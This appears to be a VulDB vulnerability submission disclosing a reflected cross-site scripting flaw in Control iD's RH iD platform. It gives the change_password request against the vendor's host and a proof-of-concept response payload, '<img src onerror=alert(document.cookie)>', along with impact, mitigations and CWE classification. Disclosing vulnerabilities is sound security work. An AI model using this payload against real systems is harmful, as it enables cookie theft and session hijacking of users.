| Title | Control iD RH iD v25.2.25.0 Cross-Site Scripting via API Response Manipulation |
|---|
| Description | Vendor: Control iD
Product: RH iD
A Cross-Site Scripting (XSS) vulnerability was identified in Control iD platform. The issue arises from improper handling of API responses, where user-controlled input is reflected directly in the front-end without proper sanitization.
Request:
POST /v2/customerdb/person.svc/change_password HTTP/2
Host: www.rhid.com.br
{"oldPassword":"Null'","newPassword":"teste123'"}
Response:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
"Erro ao alterar a senha: senha anterior errada"
POC ----------------
By intercepting the API response and modifying the `message` field, an attacker can inject JavaScript that will execute on the client-side when processed by the front-end.
Malicius Response:
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
"<img src onerror=alert(document.cookie)>"
When this response is rendered on the webpage, the JavaScript within the `message` field executes, leading to an XSS attack.
Impact:
- Theft of authentication cookies and session hijacking.
- Potential redirection to malicious websites.
- Defacement or unauthorized actions performed on behalf of the victim.
Mitigation:
- Implement proper output encoding before displaying any user-supplied data.
- Use Content Security Policy (CSP) to restrict script execution.
- Sanitize API responses before rendering them in the front-end.
Classification:
- Type: Reflected XSS via API Response Manipulation
- CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') |
|---|
| Source | ⚠️ https://github.com/yago3008/cves |
|---|
| User | y4g0 (UID 80480) |
|---|
| Submission | 02/26/2025 21:03 (1 Year ago) |
|---|
| Moderation | 03/08/2025 15:47 (10 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 299037 [Control iD RH iD 25.2.25.0 API change_password Message cross site scripting] |
|---|
| Points | 20 |
|---|